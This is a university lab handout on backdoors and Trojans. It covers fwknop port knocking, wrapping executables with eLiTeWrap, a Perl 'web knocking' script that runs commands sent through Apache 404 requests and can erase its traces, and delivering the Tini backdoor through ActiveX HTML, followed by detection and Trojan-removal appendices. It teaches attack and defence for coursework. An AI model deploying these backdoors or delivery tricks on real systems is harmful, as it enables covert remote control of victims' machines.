"fwknop implements network access controls (via iptables) based on a flexible port knocking mini-language, but with a twist; it combines port knocking and passive operating system fingerprinting to make it possible to do things like only allow, say, Linux-2.4/2.6 systems to connect to your SSH daemon. fwknop supports shared, multi-protocol port knock sequences along with both relative and absolute timeouts, and coded port knock sequences encrypted with the Rijndael block cipher."

On your RH WS4 machine connect to the NAS and get the file "fwknop-0.4.2.tar.gz" from the Lab6 directory. Move this file to your /root directory.
    # cd ~
    # tar xvfz fwknop-0.4.2.tar.gz
    # cd fwknop-0.4.2
    # ./install.pl
    [+] Would you like access alerts sent to a different address ([y]/n)? n
    [+] Enable fwknop at boot time ([y]/n)? y

Do the following steps to make sure the packets are logged:
    # service syslog start
    # iptables -F
    # iptables -A INPUT -j LOG --log-tcp-options --log-ip-options --log-prefix "DROP:" -p tcp -m state --state NEW
    # iptables -A INPUT -j DROP -p tcp -m state --state NEW
    # service iptables status

Let's modify fwknop to allow us to connect to any port using an encrypted knock. Modify the following line in /etc/fwknop/access.conf:
    KEY: <choose a key at least 8 chars long>;
This will open a firewall port for the source IP address of anyone who knows the key. Note that the desired firewall port to open is specified by the client.

There are two daemons required for fwknop to function correctly: fwknop and knopmd. knopmd reads the iptables logfile and extracts port knocks into a named pipe. The named pipe is then read by fwknop, which interprets the port knocks and adds/removes iptables rules accordingly.
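The knock-validation side of what knopmd and fwknop do, as an added Python example written for this handout (not fwknop's code): it reads iptables log lines carrying the lab's "DROP:" prefix, decodes an authenticated knock, and refuses stale knocks and replays. The knock format, key, addresses and log lines are assumptions constructed for the example; the real fwknop encrypts its sequence with Rijndael, whereas this toy sends the timestamp and port in clear and binds them to the shared key and source IP with an HMAC-SHA256 tag.

```python
"""Toy knopmd/fwknop pipeline: iptables LOG lines -> knock sequence -> rule (added example)."""
import hashlib
import hmac
import re
import time
from collections import defaultdict

TS_PORTS, MAC_PORTS, WINDOW = 3, 4, 30    # 36-bit timestamp, 64-bit tag, validity in seconds
KNOCK_LEN = TS_PORTS + 1 + MAC_PORTS      # timestamp ports + requested port + tag ports
LOG_RE = re.compile(r"DROP: .*SRC=(?P<src>[\d.]+) .*PROTO=TCP .*DPT=(?P<dpt>\d+)")
DEMO_KEY = b"correct horse battery staple"  # constructed shared key (>= 8 chars, as access.conf asks)


def _tag_ports(key, src_ip, ts, port):
    """HMAC-SHA256 over (source IP, timestamp, port), truncated to 64 bits and
    packed into four destination ports in the range 1..65535."""
    tag = hmac.new(key, f"{src_ip}|{ts}|{port}".encode(), hashlib.sha256).digest()[:8]
    return [int.from_bytes(tag[i:i + 2], "big") % 65535 + 1 for i in range(0, 8, 2)]


def build_knock(key, src_ip, port, ts):
    """Client side (the toy equivalent of 'fwknop -e -k HOST -s -p PORT'): timestamp as
    three 12-bit chunks (ports 1024..5119), then the requested port, then the tag."""
    ts_ports = [1024 + ((ts >> shift) & 0xFFF) for shift in (24, 12, 0)]
    return ts_ports + [port] + _tag_ports(key, src_ip, ts, port)


def iptables_log_line(src, dpt):
    """Constructed syslog line in the shape the lab's '--log-prefix DROP:' rule produces."""
    return (f"Oct 10 23:12:01 rhws4 kernel: DROP: IN=eth0 OUT= SRC={src} DST=10.0.0.1 "
            f"LEN=60 TTL=64 PROTO=TCP SPT=40000 DPT={dpt} WINDOW=5840 SYN URGP=0")


class KnockServer:
    """knopmd's job (collect DPTs per source from the log) plus fwknop's (validate)."""

    def __init__(self, key, now=time.time):
        self.key, self.now = key, now
        self.pending = defaultdict(list)      # source ip -> last KNOCK_LEN ports it hit
        self.seen = set()                     # (source ip, timestamp) already honoured

    def feed(self, line):
        """Consume one log line; return the iptables rule to run when a knock validates."""
        m = LOG_RE.search(line)
        if not m:
            return None
        src = m.group("src")
        seq = self.pending[src]
        seq.append(int(m.group("dpt")))
        del seq[:-KNOCK_LEN]                  # sliding window: earlier scans/noise drop out
        rule = self.verify(src, seq) if len(seq) == KNOCK_LEN else None
        if rule:
            seq.clear()
        return rule

    def verify(self, src, ports):
        ts = 0
        for p in ports[:TS_PORTS]:
            if not 1024 <= p <= 1024 + 0xFFF:
                return None                   # not a timestamp port at all
            ts = (ts << 12) | (p - 1024)
        port = ports[TS_PORTS]
        if abs(self.now() - ts) > WINDOW:     # stale (or future) knock
            return None
        if (src, ts) in self.seen:            # exact replay of a knock already honoured
            return None
        expected = _tag_ports(self.key, src, ts, port)
        if not hmac.compare_digest(str(expected), str(ports[TS_PORTS + 1:])):
            return None                       # wrong key, or replayed from another source IP
        self.seen.add((src, ts))
        return f"iptables -I INPUT -s {src} -p tcp --dport {port} -j ACCEPT"


def run_demo(now=1_130_000_000):
    """A valid knock preceded by an unrelated probe, then two attacks on it:
    a verbatim replay, and the same ports replayed from another source address."""
    src = "10.0.0.5"
    server = KnockServer(DEMO_KEY, now=lambda: now)
    knock = build_knock(DEMO_KEY, src, 22, now - 5)
    lines = [iptables_log_line(src, 4444)] + [iptables_log_line(src, p) for p in knock]
    first = [server.feed(line) for line in lines]
    replay = [server.feed(line) for line in lines[1:]]
    other_src = [server.feed(iptables_log_line("10.0.0.6", p)) for p in knock]
    return first, replay, other_src


if __name__ == "__main__":
    for label, verdicts in zip(("first", "replay", "other_src"), run_demo()):
        print(label, verdicts)
```

Only the first pass yields a rule; the replay and the cross-source replay both fall through the checks, which is the property the encrypted fwknop sequence provides with the source IP and timestamp it embeds.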
It is critical that both daemons are always running; as a result there is a third daemon, knopwatchd, whose sole purpose is to ensure both knopmd and fwknop are running and to restart them if they stop. To start fwknop, we will run the monitoring daemon:
    # knopwatchd

The server is now listening for port knocks; let's try to connect. For simplicity we will attempt to connect from the localhost. This is essentially identical to a remote connection, since all hosts, including loopback, should be blocked before we port-knock.
    # fwknop -e -k localhost -s -p 22 -P tcp
    -e: use encryption
    -k: port-knock target
    -s: allow source IP
    -p: port to open
    -P: protocol of port to open

After you enter your password, you should see the knock sequence. Notice that there is no sign of success. All you can do now is attempt to SSH into localhost, which should work now.
    # ssh localhost

You can also check the firewall ruleset to see if your special rule has been added:
    # service iptables status

There are many interesting things you can do with fwknop. Explore the manpages and the config files in /etc/fwknop to grasp the available features. One intriguing feature of fwknop is its bundling of the passive OS fingerprinting tool p0f. This allows you to restrict port knocks to specific host OSes. The available OS fingerprints are in /etc/fwknop/pf.os.

1) Create an access rule to allow an OpenBSD 3.3-3.5 box on the non-routable 10.0.0.0/8 subnet to access port 22 using an encrypted knock sequence.
2) It was mentioned that port knocking began with a virus. Why would a virus writer want to include port knocking in the backdoor?
3) No mention was made of how port knocking servers finally close the open firewall port. List two ways which could be employed to close the port.

Section 9: Tricking Users into Opening Backdoors

One way of opening backdoors is to have the very users of the machines open them for you. One good way to do this is by sending the user a file that looks and feels safe.
Programs known as "wrappers" combine a series of files into one executable file. Once the wrapper file is opened, all the wrapped files start to execute. The execution can be in series or in parallel, depending upon the wrapper. We will use one of the best known wrapper utilities, eLiTeWrap v1.04: http://homepage.ntworld.com/chawmp/elitewrap

On a Windows XP machine, go into the Lab6 directory on the NAS. Make sure that the "elitewrap" folder is there. Copy this to your desktop and unzip it. Note that there is nothing to install. Open up a command prompt and change directory to the "elitewrap" folder. Elitewrap is command line driven. View the readme.txt file now and make sure you have a clear understanding of the usage of elitewrap.

We will now create a totally harmless executable: a wrapper that executes calc.exe and notepad.exe. We will make it so that all the user sees is the calculator when they open the wrapper executable. We also want notepad.exe to open after the user has closed the calculator, and we want it to be invisible. Before proceeding, be sure to close all instances of "notepad" and "calc". Press Ctrl-Alt-Del and verify that neither "notepad.exe" nor "calc.exe" appears under the Processes tab. In the command prompt, follow the steps:
1. Run the executable elitewrap.exe from the appropriate directory.
2. Enter name of output file as "NewCalculator.exe"
3. Perform CRC-32 checking? No
4. Enter package file #1: C:\Windows\system32\calc.exe
5. Enter operation: 4
6. Enter command line: <blank>
7. Enter package file #2: C:\Windows\system32\notepad.exe
8. Enter operation: 9
9. Enter command line: <blank>
10. Enter package file #3: <blank>

In the Windows GUI, go into the "elitewrap" folder and you should now see a new file named NewCalculator.exe. Double click on NewCalculator.exe and the calculator program should open up. Now check the Processes tab.
Notice how calc.exe is a running process (and there is still no instance of notepad.exe). Close the calculator program.
Q10.1.1 Does the notepad program appear after closing the calculator program?
Go back to the Processes window.
Q10.1.2 Can you see notepad.exe in the Processes window this time?
Q10.1.3 How do you detect a Trojan of this kind?

There are other programs like Silkrope (http://www.softpedia.com/public/cat/1/1-47.shtml) which allow an attacker to create a Trojan. For example, if you have an installer for Quake called quake.exe and an installer for a backdoor program like the ones we examined above, Silkrope allows you to combine these two installers into a single executable file. Thus, when the user launches the installer for Quake, the backdoor program gets installed in the background without the user being aware of it. It might then send a message over the network to the attacker signaling that the machine has been compromised.

Section 10: Web Knocking

Traditional port knocking requires that the machine be reachable on any of its ports, but firewall rules can easily be set up to protect machines such as web servers and mail servers that offer services on specific ports and to block everything else. The concept of web knocking involves sending HTTP requests to a web server. These may be invalid requests or requests for pages which do not exist. Embedded in these requests are commands to be executed. The primary difference between port knocking and web knocking is that if a firewall exists, all port knocking attempts can be thwarted, whereas web knocking attempts will still be let through, since the firewall by default must allow traffic on port 80 to reach the web server.

[Figure: Port knocking vs. web knocking. The user's port knocking attempts (ports 9250, 5250, 2234, 1250) are blocked by the firewall, which has only port 80 open; web knocking requests (HTTP requests answered with 404 on port 80) are allowed through the firewall to the web server.]

For further details (you may have to use Google Translate): http://semaphor.homeunix.org/semaphor.php?item=webknocking

(Our version of web knocking is simpler: the knocking code is just a single page. The implementation can be extended to include a complex knocking sequence which opens up a port or sets up a remote shell.)

We have created a proof-of-concept web knocker script in Perl. This program performs the following tasks:
a. Define the knocking code. (The value in $var defines the knocking code used to activate the web knocker.)
b. Extract all lines from the Apache error_log which contain the knocking code. (This is done so that we can see whether someone has sent the knocking code. We search the error_log, since this is where all "404 File not found" errors are recorded.)
c. See which commands have already been executed and ignore those.
d. For each unexecuted command, execute it. (If we were to run this in stealth mode, the output would not appear on screen.)
e. If we wish to erase all traces of our web knocker, we send the command "clean_up" following the knocking code (http://target/command_to_execute=clean_up).

knock.pl:

    #!/usr/bin/perl
    $var   = "command_to_execute=";   # Knocking code which precedes a command
    $fname = "cmd_exec";              # Temp file name

    # Extract all lines from the log file which contain the knocking code
    system("cat /var/log/httpd/error_log | grep $var > $fname.new");
    if (! -e "$fname.old") {
        system("touch $fname.old");   # Create a blank file if it does not exist
    }
    # Find the commands which have not been executed yet
    system("diff $fname.new $fname.old > diff_file");

    $LOGFILE = "diff_file";
    open(LOGFILE) or die("Could not open diff file.");
    foreach $line (<LOGFILE>) {
        $index = index($line, $var);
        next if $index < 0;           # diff header lines carry no knocking code
        $strt = $index + length($var);
        #print "Starting : $strt : ";
        $cmd = substr($line, $strt);  # Extract the command to be executed
        chomp($cmd);                  # Drop the trailing newline, otherwise "clean_up" never matches
        if ($cmd ne "") {
            if ($cmd eq "clean_up") {
                system("rm -f $fname.*");   # Clean up temp files
                system("rm -f $LOGFILE");   # We could also remove all traces from the logs as well
                exit(1);
            }
            print "Executing : $cmd\n";     # Tell the user the command is executing
                                            # (can be commented out if running in silent mode)
            system($cmd);                   # Execute command
        }
    }
    close(LOGFILE);
    system("mv $fname.new $fname.old");     # Store all completed commands in old file

We would ideally run this script as a cron job to ensure that it runs constantly in the background, rather than in a while loop, which would show up as a running process.

Setting up Web Knocking [on the RedHat 7.2 machine]:
1. Start the httpd daemon:
    $ service httpd start
2. If the httpd daemon is not installed, install it using
    $ rpm -Uvh <apache installation file>
3. Once the httpd daemon has started, check whether you can view the home page of the web server.
4. Go to the browser and type http://a.b.c.d+1, e.g. http://57.35.6.167
5. If you cannot see a page, please ask the TA for assistance in setting up Apache.
6. Once the web service has started, copy the Perl script (knock.pl) to your machine.
7. To perform web knocking, we basically send a knocking code to the web server. In our example, the knocking code is "command_to_execute=", followed by the specific command which we wish to execute. Try numerous different commands such as ls, ll, ps, w, etc. and note the results.
    http://a.b.c.d+1/command_to_execute=ll
    http://a.b.c.d+1/command_to_execute=ps
    http://a.b.c.d+1/command_to_execute=w
   Additionally, you could also execute netcat to open a reverse shell from the server to your machine.
8. Now, at the command prompt type
    $ perl knock.pl
   This will cause the Perl script to run, executing all the commands that were requested. We do this to simulate the web knocker being executed as a cron script. Although setting this script up as a cron job is beyond the scope of this lab, we intend to simulate its execution.
Screenshot #1: Capture the output of the Perl script. Your output should look like:

    [root@RedHat72 webknock]# perl knock.pl
    Executing : ll
    total 36
    -rw-r--r--    1 root     root            0 Oct 10 23:12 cmd_exec.new
    -rw-r--r--    1 root     root          717 Oct  9 20:46 cmd_exec.old
    -rw-r--r--    1 root     root          735 Oct 10 23:12 diff_file
    drwxr-xr-x    2 root     root         4096 Oct  9 20:36 hello
    -rwxrwxr-x    1 root     root         1085 Oct 10 11:35 knock.pl
    Executing : ps
      PID TTY          TIME CMD
    21023 pts/2    00:00:00 bash
    21093 pts/2    00:00:00 perl
    21102 pts/2    00:00:00 ps
    Executing : w
     23:12:15 up 2 days, 6:40, 4 users, load average: 0.08, 0.02, 0.01
    USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
    jeremy   :0                         Sat19   ?xdm?   7:24  0.03s  /bin/sh
    jeremy   pts/1                      Sat19   2days   0.00s 0.56s  kdeinit: kded
    root     pts/6                      23:12   0.00s   0.00s 0.00s  /bin/bash
    root     pts/2    57.35.6.166       23:11   0.00s   0.02s 0.00s  perl knock.pl
    [root@RedHat72 webknock]#

9. Under ideal conditions we would most likely set this up as a cron script so that it runs at fixed intervals of time, say every five minutes.
10. To set up this script as a cron script, we would edit the crontab file in the /etc/ folder.

Section 11: Using Explorer's ActiveX to Propagate Trojans/Backdoors

Trojans can be distributed to users of Internet Explorer because Explorer's ActiveX executes scripts from web pages. We will now use a backdoor named Tini and a program that converts EXEs to HTML called EXE2HTML to infect a virtual machine. For this we download EXE2HTML and Tini from http://www.illmob.org/files.html. Tini is a small backdoor (3 kB) which will be used to open a remote shell. Size is important because this method will fail if the file is too big, since it occupies around four times its size in HTML. Hackers would probably replace Tini with a small Trojan which automatically downloads a bigger, more complex Trojan from the Internet. The first step is to convert Tini into an HTML file to be sent over the Internet.
For this we perform the following set of commands:
Copy tini.exe to the same directory as EXE2HTML.EXE.
Double click on EXE2HTML.EXE.
Press Tab three times to get to the Source File: option.
Type the name of the file to be converted to HTML (i.e. tini.exe).
Press Tab five more times to reach [ ] None and check it by pressing Enter.
Press Tab nine more times to reach [ ] Compile HTML. Your window should now look something similar to the following screen shot.
Press Enter. You will now have an HTML file named OUTPUT.HTML. This page contains the file tini.exe and the code necessary for Internet Explorer. An attacker would probably place this page on a web server and give links to the people he wants to infect.

Double click on this HTML file to open it using Internet Explorer. This simulates opening a web page from a web server. You will see a window like the following.

Internet Explorer tries to warn you, but most people just click Yes to continue. In versions 5.0/5.1 of Internet Explorer, it does not ask if you want to run the ActiveX control. Click Yes to accept. Because the HTML file was opened, the file WINDRV.HTA was created in Start > All Programs > Startup; it contains the program to be executed.

The executable web page is placed here because it will now be executed every time the computer boots. Reboot your virtual machine. After the reboot, turn on another virtual machine to telnet from. It can be either Windows or Linux. Type:
    telnet <Target IP> 7777
7777 is the port number of Tini. Now wait a few seconds and press Enter. It is important that you press Enter or you will not see anything. In Linux you will now get a shell, as illustrated on the following screen shot. In Windows you will see the following.

General Questions

How long did it take you to complete this lab? Was it an appropriate length lab?
What corrections and or improvements do you suggest for this lab?
Please be very specific, and if you add new material give the exact wording and instructions you would give to future students in the new lab handout. You may cross out and edit the text of the lab on previous pages to make corrections. You need to be very specific and provide details. You need to actually do the suggested additions in the lab and provide solutions to your suggested additions.

Caution as usual: only extract and use the tools you downloaded in the safe and approved environment of the network security laboratory.

Appendix A: Win XP Safeguarding
http://www.windowsecurity.com/articles/Hidden_Backdoors_Trojan_Horses_and_Rootkit_Tools_in_a_Windows_Environment.html

Is your system secure? How do you know? A machine is very rarely targeted for an attack for any other reason than because it was vulnerable. One of the first steps in being proactive is to assess your basic security policy rules and requirements. I think that having up-to-date anti-virus software installed is a primary concern, and even if it won't fully protect your machine by itself, it can be a lifesaver, providing good protection against most viruses and trojans. Another good practice is to look routinely at any modification of programs to discover new, odd services or processes. Administration scripts are very useful tools in this regard, particularly when dealing with multiple systems. One might also wish to consider host scanning on your network from time to time. If you suspect that there is an open port on your computer, take a snapshot to check whether it is authorized or not. You may use network, application diagnosis and troubleshooting programs such as TCPview (Fig. 5) [12], FPort [13], Inzider [14], Active Ports (Fig. 6) [15], or Vision [16].

Fig. 5: The TCPview tool allows you to locate which application opened a port on your computer. Like Active Ports, it tells you what is running on which port.

Fig. 6: Active Ports in action

These tools provide a means to identify the specific application opening the port. Moreover, they let one avoid using Netstat, if one suspects that it has been replaced or infected. This brings me to another interesting consideration: whichever tool is used, it is a good practice to use original tools previously uploaded on a trusted diskette or CD-ROM when attempting to check the system. If any doubt exists whether individual tools are original ones, checksum them to check that they match the installation CD-ROM. In this regard, ListDlls [17] and Process Explorer [18] (Fig. 7) can certainly be useful in finding any suspect signs of trojan-infected or backdoored processes.

Fig. 7: Process Explorer displays processes and their related DLL libraries

These programs with their DLL libraries give some assistance and provide additional information on handling incidents, investigations and conducting analysis to gather legal evidence in view of criminal prosecution. May I also suggest that one pay closer attention to the registry keys that are responsible for starting programs at system startup. In most cases, these registry elements contain some indication of how the intruder gained access, from where, when, etc.
These are:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\KnownDLLs
HKEY_LOCAL_MACHINE\System\ControlSet001\Control\Session Manager\KnownDLLs
HKEY_LOCAL_MACHINE\System\ControlSet\Services
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WinLogon
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows (run)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows (run)
HKEY_CLASSES_ROOT\exefile\shell\open\command

It is extremely important to establish consistent access permissions on these keys and activate inspection tools to continuously monitor for any malicious attempts. The same applies to those system directories and files that are security critical. A commonly accepted computer security policy usually starts with a "sound" firewall as a guard against backdoors. Even if the intruder manages to install a backdoor, the firewall will block him from getting to the listening port. In fact, bypassing a firewall is not a plug-n-play thing, but I take the liberty to serve a nice dose of pessimism: there are known hacker tools that can get through even the most hardened firewalls. However, this is beyond the scope of this article, so I would recommend reading the document available at http://www.spirit.com/Network/net0699.txt. Finally, I would like to raise your awareness about a certain issue.
Once your machine has been compromised and the hacker has gained total administrative access, be very careful in recovering the system from the back-up copy or the disk image! I have personally experienced a situation where someone replaced a WWW site. The system administrator had retrieved the system from a back-up copy, patched the system, updated the access database and changed passwords. Thus, he considered the server perfectly safe. But he overlooked the fact that the intrusion had been made long before he made the copy, so the copy contained a back-doored version. So, I would strongly recommend checking the system whenever it is backed up.

Hackers increasingly threaten the network community with their new techniques, backdoors and Trojan horses. Therefore we must take steps to guard against known methods of hacking, even though there will still be a large number of worrying factors we don't know about. The only thing that is absolutely obvious: you never know how long your immune system can hold out before breaking down.
Tools:
[1] Netcat - http://www.hackerscor.com/km/files/hfiles/ncnt090.zip
[2] iCMD - http://go8.163.com/lmqkkk/mytools/iCmd.exe
[3] RemoteNC - http://go8.163.com/lmqkkk/mytools/remotenc.zip
[4] Tini - http://go8.163.com/lmqkkk/mytools/tini.exe
[5] WinShell - http://go8.163.com/lmqkkk/mytools/Winshell4.0.zip
[6] CGI-backdoor - http://go8.163.com/lmqkkk/mytools/cgi.zip
[7] Remote Administrator - www.radmin.com
[8] TightVNC - http://www.tightvnc.com/download.html
[9] Rootkit v.0.44 - www.ndsafe.com/fires/rk_044.zip
[10] Rootkit v.0.40 - http://www.megasecurity.org/Tools/Files/Nt_rootkit0.40.zip
[11] IIP Driver - http://www.pedestalsoftware.com/intact/iipdriver.htm
[12] TCPview - www.winternals.com
[13] Fport - http://www.foundstone.com/knowledge/proddesc/fport.html
[14] Inzider - http://ntsecurity.nu/toolbox/inzider/
[15] Active Ports - http://www.ntutility.com/freeware.html
[16] Vision - http://www.foundstone.com/knowledge/proddesc/vision.html
[17] ListDlls - http://www.sysinternals.com/ntw2k/freeware/listdlls.shtml
[18] Process Explorer - http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
[19] LANguard Network Security Scanner

Appendix B: Trojan Removal
http://forums.majorgeeks.com/showthread.php?t=35407

Introduction: This article reflects countless hours of experience removing spyware, trojans and viruses. If you can take the time to do all of these steps, there's a good chance your problem will be solved by following this article. While all of these steps are not required for each case, they should be beneficial to all. In general, these steps should work on all versions of Windows XP, but some may not apply to older operating systems like Windows 98. If you need to post a new thread requesting support, be sure you have done all of these steps, tell us you did so, what symptoms you are experiencing, and then follow any directions we give you exactly.
As you can see from reading some of the threads, people often ask for advice, then only do bits and pieces. This will not help you; it will frustrate us and take more time than required.

Section 1 makes sure your computer is not at risk for hard-to-remove viruses. Section 2 covers cleaning and removal. Section 3 makes suggestions on securing your machine after clean up. Complete ALL the applicable steps of Getting Prepared and then you MUST complete all 4 steps from Scanning And Cleaning Steps.

Getting Prepared; Steps to be sure your system is ready to be scanned:

1: Disable System Restore temporarily (WinXP & WinME only) if you are infected; any trojans, spyware, etc. you may have picked up could have been saved in System Restore and are waiting to re-infect you. Since System Restore is a protected directory, your tools cannot access it to delete files, trapping viruses inside. Please follow the instructions to do that here: http://forums.majorgeeks.com/showthread.php?t=31668

2: Network Security, Workstation Netlogon Services & Remote Procedure Call (RPC) Helper (Windows XP, 2K, NT); only do this step if you have the about:blank or home search hijack. You need to check to see if any of the following three Windows services are running:
Network Security Service
Workstation Netlogon Service
Remote Procedure Call (RPC) Helper
To do this, click Start, Run, and enter the following in the Open box: "services.msc" (without the quotes). Then click OK. Now, in the Services window that pops up, look for exactly the following service names (no others): "Network Security Service" or "Workstation Netlogon Service" or "Remote Procedure Call (RPC) Helper". (NOTE: DO NOT DISABLE Remote Procedure Call (RPC) or Remote Procedure Call (RPC) Locator. They are both required services and are unrelated to the hijacker.) You could have more than one of the 3 mentioned bad services, so look for all of them.
If you find these services, you must right click on each one to bring up the service Properties window and do the following (refer to the Figure too):
Step 1: Stop the service by clicking the Stop button.
Step 2: Now, disable it by changing the Startup type to Disabled and click Apply.
If you do not find these exact services, do not worry and just skip this step. DO NOT DISABLE ANYTHING UNLESS THE EXACT WORDING OF THE SERVICE NAMES IS MATCHED.

3: Enable viewing of hidden files and folders and extensions; some programs can hide this way by not being visible in Windows. Start Windows Explorer and click on your main hard drive, usually C:\. Then select Tools from the top of Windows Explorer and then Folder Options. Go to the View tab. Scroll down to the folder icon that says Hidden files and folders and check Show hidden files and folders. Also, right below it, uncheck Hide file extensions for known types. Not doing this could allow file extensions commonly used by trojans and spyware to be hidden, for example a file ending in .exe or .dll, making manually finding it, if needed, difficult to impossible.

4: Downloading Tools; download the following tools and save them in your favorite download folder or create one, for example C:\Temp or C:\Downloads. Then install, update, and configure as indicated below. While this may seem like overkill, there currently is no one perfect removal tool. Because of this, to properly find and fix your problem, you need to try a variety of programs.
TIP: Create a folder on your C:\ drive for the tools/utilities you will need to use. For example: navigate to your C:\ folder and right click on a blank spot in the window > choose New > Folder. Name this folder Spyware Tools. Now you can save the tools you will be downloading to this folder and, if you prefer, create sub-folders named for each individual utility.

Ad-Aware SE: Install, click Check for Updates now and get any updates, then exit.
Ad-Aware VX2 Cleaner Plug-In: Install only.
CCleaner: Install only, then exit.
Spybot: Install, do the search for updates now and get any updates, then exit.
Spybot - Search and Destroy DSO Exploit Fix: Install this patch on top of Spybot to fix the DSO Exploit bug.
SpywareBlaster: Install, click Download Latest Protection Updates, Check for Updates, and then Enable All Protection, then exit. It does a great job of blocking known vulnerabilities as well as known malicious websites.
McAfee AVERT Stinger: No installation required! Ready to run as is.
CWShredder: No installation required! Just unzip it to a folder.
Kill2me: No installation required! Just unzip it to a folder.
about:Buster: No installation required! Just unzip it to a folder. Click Update and download any updates before scanning.
HSRemove: No installation required! Ready to run as is. (Only for WinNT, 2K, XP)

Your system is now ready to be properly scanned for spyware, trojans and viruses.

Scanning And Cleaning Steps: (These 4 steps are NOT optional and must be run!!)

1: Virus And Trojan Scanning (do not skip these two scans or you will be asked to run them before continuing)
a) Win9x (Windows 95, 98, 98SE) users boot normal mode.
   Do an online scan at Trend Micro's Free Online Virus Scan.
   Do an online scan at Symantec Security Check.
   Now boot in safe mode (and remain there) and run McAfee AVERT Stinger. See how to boot in safe mode below.
b) Windows XP, 2000, NT, ME users boot in "safe mode with networking support" (and remain there). See how to boot in safe mode below.
   Do an online scan at Trend Micro's Free Online Virus Scan.
   Do an online scan at Symantec Security Check.
   Run McAfee AVERT Stinger.
NOTE: If using a non-IE browser, you can use Trend Micro's online scan with Java located HERE.

How to boot in safe mode: To boot into safe mode, restart your computer and tap the F8 key (after the first black and white screen, but before the Windows splash screen) until you get to a black and white screen asking you what to do. With Windows XP, 2000, NT, ME: use your arrow keys and select "safe mode with networking support". Booting in safe mode is important because best results are achieved since safe mode disables most drivers and running programs. If you have a problem for any reason trying to run these scans in safe mode, do them in normal boot mode but make sure you tell us that in any subsequent message you may need to post about your problem.

Important Note Before continuing with scans: To provide the greatest ability for the scanners to properly detect and remove all forms of malware, make sure to close any other applications that are running on your system, especially browsers, before you run these tools. It is in your best interest to follow this directive. So disconnect from the internet now and close all browsers and any other applications you have running, and then continue with step 2 below.

2: Clean Your Hard Drive; remove temporary internet and other files not needed with CCleaner. Run CCleaner with the default options to clean out temporary files. Optionally, check the "Delete Index.dat" checkbox. Only use the Windows tab and select Run Cleaner. Do not run any other options from other tabs.

3: Main Spyware Scan And Removal; scan your machine with Ad-Aware SE (remember to install the Ad-Aware VX2 Cleaner Plug-In for it) and Spybot. Look for the Immunize feature in Spybot and use it. Make sure you install the Spybot DSO Exploit patch before running a scan with Spybot.
4: Secondary Spyware Scan And Removal: Other Removal Tools; Run the other programs you downloaded; CWShredder (make sure you select Fix), Kill2me, about:Buster and HSRemove. They are free, standalone and easy to use. Note: about:Buster and HSRemove need only be run if you are having about:blank or HomeSearchAssistent hijacks. Also, note that HSRemove is not compatible 37 37 with Win9x or WinMe systems. OPTIONAL Steps: require you reboot back to normal mode. 1: OPTIONAL: If you can not remove the stubborn "Only the Best" aka "HSA" HIJACKER please view this thread by Chaslang, an expert in removing these things, can be found here: http://forums.majorgeeks.com/showthread.php?t=38772 2: OPTIONAL: Scan With Hijack This; If you have gotten this far without success, you may need to download Hijack This!. Taking a few minutes to read this tutorial is required before posting a logfile so that you can get the most from it and make it easier to diagnose. Please post your logfile as an attachment and only when asked. Make sure that you tell us in your post that you've already followed the instructions on this page so we don't waste your and our time by posting a link to it in your thread. Also, it would be helpful to indicate what kind of problems the above steps have found and fixed (or failed to fix). Alternative Scans - If still having problems If you are still having problems after performing all the above, these alternative scans below may prove to be useful. As mentioned above, it would be good to perform these in safe mode since it may assist in the ability to remove an infection. However, there are cases where a problem does not show itself completely until you boot in normal mode. So first run these scans in normal boot mode, and if they have problems cleaning any particular items repeat the scan in safe mode to see if it helps. Always keep track of what these scans find (save logs or take notes), and report them back in your thread to anyone helping you. 
Bitdefender online scan
RavAntivirus online scan <-- select Auto Clean, then click Scan My PC
TrojanScan online scan
a-squared (a²) Free edition: free, but requires an email address to register
avast! Virus Cleaner Tool
ADS SPY - Alternate Data Streams Spy from Merijn. Recent browser hijackers have started using ADS to hide their files, and very few anti-malware scanners detect this. Use ADS Spy to find and remove these streams. Note: this app also displays legitimate ADS streams. Do not delete streams unless you are completely sure they are malicious! You should consult with an expert before deleting any files with this tool.

Keeping your computer safe and secure:

1: Windows Update; Update Windows at Microsoft Windows Update. Just click on Start, then Windows Update. Many security loopholes are found and exploited, and Microsoft issues patches for them. As an example, millions of people were affected by the Blaster worm because they were not up to date. If you are not up to date, you are at risk. You can set up automatic updates in your control panel; go to Start, Settings, Control Panel.

2: Remove Microsoft Java; Microsoft's no longer supported version of Java is often a source of installed spyware and hijacks, so it is a good idea to remove the Microsoft Java Virtual Machine and install Sun Java. To remove it, follow these steps:
   1: Select Start > Run, enter "RunDll32 advpack.dll,LaunchINFSection java.inf,UnInstall" in the Open box, and click OK.
   2: Click Yes to confirm that you want to remove the Microsoft VM.
   3: When prompted, reboot the computer.
   4: Remove the following items (%Systemroot% is where Windows is installed, usually C:\Windows):
      - The %Systemroot%\Java folder
      - The file java.PNF from the %Systemroot%\inf folder
      - The files jview.exe and wjview.exe from the %Systemroot%\system32 folder
      - The registry subkey HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Java VM
      - The registry subkey HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\JAVA_VM
      OR download and run the MSJVM Removal Tool 1.0a.
   5: Install Sun Java from http://java.com/en/ (you can choose a different language from the top menu on that page).
   (Any files or registry entries not found, or any errors, can be ignored; just go on to the next step.)

Optionally, consider replacing your web browser with a free alternative such as Firefox, or a shareware browser such as Opera.

ECE 4112 Internetwork Security Lab 6: Backdoors and Trojans
Group Number: _________
Member Names: ___________________ _______________________

Answer Sheet

